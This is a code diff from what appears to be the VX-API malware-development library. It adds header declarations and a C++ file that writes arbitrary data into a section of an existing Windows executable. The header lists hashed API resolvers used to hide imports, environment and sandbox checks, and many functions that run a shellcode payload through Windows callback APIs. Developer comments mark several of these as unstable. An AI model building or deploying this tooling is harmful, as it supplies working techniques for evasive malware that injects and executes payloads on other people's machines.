BOOL HashFileByMsiFileHashTableW(_In_ PWCHAR Path, _Inout_ PULONG FileHash);
BOOL HashFileByMsiFileHashTableA(_In_ PCHAR Path, _Inout_ PULONG FileHash);
BOOL HashFileByMsiFileHashTableW(_In_ LPCWSTR Path, _Inout_ PULONG FileHash);
BOOL HashFileByMsiFileHashTableA(_In_ LPCSTR Path, _Inout_ PULONG FileHash);
ULONG CreatePseudoRandomIntegerFromNtdll(_In_ ULONG Seed);
@ -126,18 +125,18 @@ PPEB GetPeb(VOID);
PPEB GetPebFromTeb(VOID);
PKUSER_SHARED_DATA GetKUserSharedData(VOID);
PRTL_USER_PROCESS_PARAMETERS GetRtlUserProcessParameters(VOID);
DWORD64 __stdcall GetProcAddressDjb2(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
DWORD64 __stdcall GetProcAddressFowlerNollVoVariant1a(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
DWORD64 __stdcall GetProcAddressJenkinsOneAtATime32Bit(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
DWORD64 __stdcall GetProcAddressLoseLose(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
DWORD64 __stdcall GetProcAddressRotr32(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
DWORD64 __stdcall GetProcAddressSdbm(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
DWORD64 __stdcall GetProcAddressSuperFastHash(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
DWORD64 __stdcall GetProcAddressUnknownGenericHash1(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
DWORD64 __stdcall GetProcAddressSipHash(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
DWORD64 __stdcall GetProcAddressMurmur(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
DWORD64 __stdcall GetProcAddressA(_In_ DWORD64 ModuleBase, _In_ LPCSTR lpProcName);
DWORD64 __stdcall GetProcAddressW(_In_ DWORD64 ModuleBase, _In_ LPCWSTR lpProcName);
DWORD64 GetProcAddressDjb2(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
DWORD64 GetProcAddressFowlerNollVoVariant1a(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
DWORD64 GetProcAddressJenkinsOneAtATime32Bit(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
DWORD64 GetProcAddressLoseLose(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
DWORD64 GetProcAddressRotr32(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
DWORD64 GetProcAddressSdbm(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
DWORD64 GetProcAddressSuperFastHash(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
DWORD64 GetProcAddressUnknownGenericHash1(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
DWORD64 GetProcAddressSipHash(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
DWORD64 GetProcAddressMurmur(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
DWORD64 GetProcAddressA(_In_ DWORD64 ModuleBase, _In_ LPCSTR lpProcName);
DWORD64 GetProcAddressW(_In_ DWORD64 ModuleBase, _In_ LPCWSTR lpProcName);
BOOL RtlLoadPeHeaders(_Inout_ PIMAGE_DOS_HEADER* Dos, _Inout_ PIMAGE_NT_HEADERS* Nt, _Inout_ PIMAGE_FILE_HEADER* File, _Inout_ PIMAGE_OPTIONAL_HEADER* Optional, _Inout_ PBYTE* ImageBase);
HMODULE GetModuleHandleEx2A(_In_ LPCSTR lpModuleName);
HMODULE GetModuleHandleEx2W(_In_ LPCWSTR lpModuleName);
@ -151,10 +150,10 @@ HMODULE ProxyRegisterWaitLoadLibraryA(_In_ LPCSTR lpModuleName);
/*******************************************
HELPER FUNCTIONS
*******************************************/
BOOL IsPathValidA(_In_ PCHAR FilePath);
BOOL IsPathValidW(_In_ PWCHAR FilePath);
BOOL CreateLocalAppDataObjectPathW(_Inout_ PWCHAR pBuffer, _In_ PWCHAR Path, _In_ DWORD Size, _In_ BOOL bDoesObjectExist);
BOOL CreateLocalAppDataObjectPathA(_Inout_ PCHAR pBuffer, _In_ PCHAR Path, _In_ DWORD Size, _In_ BOOL bDoesObjectExist);
BOOL IsPathValidA(_In_ LPCSTR FilePath);
BOOL IsPathValidW(_In_ LPCWSTR FilePath);
BOOL CreateLocalAppDataObjectPathW(_Inout_ PWCHAR pBuffer, _In_ LPCWSTR Path, _In_ DWORD Size, _In_ BOOL bDoesObjectExist);
BOOL CreateLocalAppDataObjectPathA(_Inout_ PCHAR pBuffer, _In_ LPCSTR Path, _In_ DWORD Size, _In_ BOOL bDoesObjectExist);
BOOL GetSystemWindowsDirectoryA(_In_ DWORD nBufferLength, _Inout_ PCHAR lpBuffer);
BOOL GetSystemWindowsDirectoryW(_In_ DWORD nBufferLength, _Inout_ PWCHAR lpBuffer);
BOOL CreateWindowsObjectPathW(_Inout_ PWCHAR pBuffer, _In_ PWCHAR Path, _In_ DWORD Size, _In_ BOOL bDoesObjectExist);
@ -194,6 +193,13 @@ BOOL FastcallExecuteBinaryShellExecuteExA(_In_ PCHAR FullPathToBinary, _In_ PCHA
DWORD GetCurrentProcessIdFromOffset(VOID);
HMODULE GetPeFileBaseAddress(VOID);
DWORD64 LdrLoadGetProcedureAddress(VOID);
BOOL IsPeSectionW(_In_ LPCWSTR PathToBinary, _In_ LPCWSTR PeSectionName);
BOOL IsPeSectionA(_In_ LPCSTR PathToBinary, _In_ LPCSTR PeSectionName);
BOOL AddSectionToPeFileW(_In_ LPCWSTR Path, _In_ LPCSTR SectionName, _In_ DWORD SectionSizeInBytes);
BOOL AddSectionToPeFileA(_In_ LPCSTR Path, _In_ LPCSTR SectionName, _In_ DWORD SectionSizeInBytes);
BOOL WriteDataToPeSectionW(_In_ LPCWSTR Path, _In_ LPCWSTR SectionName, _In_ PBYTE DataToWrite, _In_ DWORD DataToWriteInBytes);
BOOL WriteDataToPeSectionA(_In_ LPCSTR Path, _In_ LPCSTR SectionName, _In_ PBYTE DataToWrite, _In_ DWORD DataToWriteInBytes);
@ -204,8 +210,8 @@ LCID GetCurrentLocaleFromTeb(VOID);
DWORD GetNumberOfLinkedDlls(VOID);
BOOL IsNvidiaGraphicsCardPresentA(VOID);
BOOL IsNvidiaGraphicsCardPresentW(VOID);
BOOL IsProcessRunningA(_In_ PCHAR ProcessNameWithExtension);
BOOL IsProcessRunningW(_In_ PWCHAR ProcessNameWithExtension);
BOOL IsProcessRunningA(_In_ LPCSTR ProcessNameWithExtension);
BOOL IsProcessRunningW(_In_ LPCWSTR ProcessNameWithExtension);
BOOL IsProcessRunningAsAdmin(VOID);
ULONG GetOsMajorVersionFromPeb(VOID);
ULONG GetOsMinorVersionFromPeb(VOID);
@ -280,6 +286,17 @@ BOOL MpfSceViaEnumerateLoadedModules64(_In_ PBYTE Payload, _In_ DWORD PayloadSiz
BOOL MpfSceViaK32EnumPageFilesW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
BOOL MpfSceViaEnumPwrSchemes(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
BOOL MpfSceViaMessageBoxIndirectW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes); //Unstable, only triggers on certain button presses, prone to crashing
BOOL MpfSceViaImmEnumInputContext(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
BOOL MpfSceViaCertFindChainInStore(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes); //Not working?
BOOL MpfSceViaEnumPropsExW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
BOOL MpfSceViaCreateThreadpoolWait(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes); //Unstable, some shellcode crashes application, requires improved testing
BOOL MpfSceViaCryptEnumOIDInfo(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
BOOL MpfSceViaDSA_EnumCallback(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
BOOL MpfSceViaCreateTimerQueueTimer(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes); //Unstable, some shellcode crashes application, requires improved testing
BOOL MpfSceViaEvtSubscribe(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes); //Unstable, some shellcode crashes application, requires improved testing
BOOL MpfSceViaFlsAlloc(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
BOOL MpfSceViaInitOnceExecuteOnce(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
/*******************************************

122
VX-API/WriteDataToPeSection.cpp Normal file
View File

@ -0,0 +1,122 @@
#include "Win32Helper.h"
BOOL WriteDataToPeSectionW(_In_ LPCWSTR Path, _In_ LPCWSTR SectionName, _In_ PBYTE DataToWrite, _In_ DWORD DataToWriteInBytes)
{
BOOL bFlag = FALSE;
HANDLE hHandle = INVALID_HANDLE_VALUE;
LONGLONG SizeOfTargetBinary = 0L;
PBYTE FileBuffer = NULL;
PIMAGE_DOS_HEADER Dos = NULL;
PIMAGE_NT_HEADERS Nt = NULL;
PIMAGE_FILE_HEADER File = NULL;
PIMAGE_OPTIONAL_HEADER Optional = NULL;
PIMAGE_SECTION_HEADER Section = NULL;
PIMAGE_SECTION_HEADER SectionHeaderArray = NULL;
CHAR DisposeableObject[32] = { 0 };
if (WCharStringToCharString(DisposeableObject, (PWCHAR)SectionName, StringLengthW(SectionName)) == 0)
goto EXIT_ROUTINE;
SizeOfTargetBinary = GetFileSizeFromPathW((PWCHAR)Path, FILE_ATTRIBUTE_NORMAL);
if (SizeOfTargetBinary == INVALID_FILE_SIZE)
goto EXIT_ROUTINE;
hHandle = CreateFileW(Path, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hHandle == INVALID_HANDLE_VALUE)
goto EXIT_ROUTINE;
FileBuffer = (PBYTE)HeapAlloc(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, SizeOfTargetBinary);
if (FileBuffer == NULL)
goto EXIT_ROUTINE;
if (!ReadFile(hHandle, FileBuffer, (DWORD)SizeOfTargetBinary, NULL, NULL))
goto EXIT_ROUTINE;
RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, &FileBuffer);
SectionHeaderArray = (PIMAGE_SECTION_HEADER)(ULONGLONG(Nt) + sizeof(IMAGE_NT_HEADERS));
for (DWORD dwX = 0; dwX < File->NumberOfSections; dwX++)
{
if (StringCompareA((PCHAR)SectionHeaderArray[dwX].Name, DisposeableObject) == ERROR_SUCCESS)
{
if (SetFilePointer(hHandle, SectionHeaderArray[dwX].PointerToRawData, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER)
goto EXIT_ROUTINE;
if (!WriteFile(hHandle, DataToWrite, DataToWriteInBytes, NULL, NULL))
goto EXIT_ROUTINE;
}
}
bFlag = TRUE;
EXIT_ROUTINE:
if (FileBuffer)
HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, FileBuffer);
if (hHandle)
CloseHandle(hHandle);
return bFlag;
}
BOOL WriteDataToPeSectionA(_In_ LPCSTR Path, _In_ LPCSTR SectionName, _In_ PBYTE DataToWrite, _In_ DWORD DataToWriteInBytes)
{
BOOL bFlag = FALSE;
HANDLE hHandle = INVALID_HANDLE_VALUE;
LONGLONG SizeOfTargetBinary = 0L;
PBYTE FileBuffer = NULL;
PIMAGE_DOS_HEADER Dos = NULL;
PIMAGE_NT_HEADERS Nt = NULL;
PIMAGE_FILE_HEADER File = NULL;
PIMAGE_OPTIONAL_HEADER Optional = NULL;
PIMAGE_SECTION_HEADER Section = NULL;
PIMAGE_SECTION_HEADER SectionHeaderArray = NULL;
SizeOfTargetBinary = GetFileSizeFromPathA((PCHAR)Path, FILE_ATTRIBUTE_NORMAL);
if (SizeOfTargetBinary == INVALID_FILE_SIZE)
goto EXIT_ROUTINE;
hHandle = CreateFileA(Path, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hHandle == INVALID_HANDLE_VALUE)
goto EXIT_ROUTINE;
FileBuffer = (PBYTE)HeapAlloc(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, SizeOfTargetBinary);
if (FileBuffer == NULL)
goto EXIT_ROUTINE;
if (!ReadFile(hHandle, FileBuffer, (DWORD)SizeOfTargetBinary, NULL, NULL))
goto EXIT_ROUTINE;
RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, &FileBuffer);
SectionHeaderArray = (PIMAGE_SECTION_HEADER)(ULONGLONG(Nt) + sizeof(IMAGE_NT_HEADERS));
for (DWORD dwX = 0; dwX < File->NumberOfSections; dwX++)
{
if (StringCompareA((PCHAR)SectionHeaderArray[dwX].Name, SectionName) == ERROR_SUCCESS)
{
if (SetFilePointer(hHandle, SectionHeaderArray[dwX].PointerToRawData, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER)
goto EXIT_ROUTINE;
if (!WriteFile(hHandle, DataToWrite, DataToWriteInBytes, NULL, NULL))
goto EXIT_ROUTINE;
}
}
bFlag = TRUE;
EXIT_ROUTINE:
if (FileBuffer)
HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, FileBuffer);
if (hHandle)
CloseHandle(hHandle);
return bFlag;
}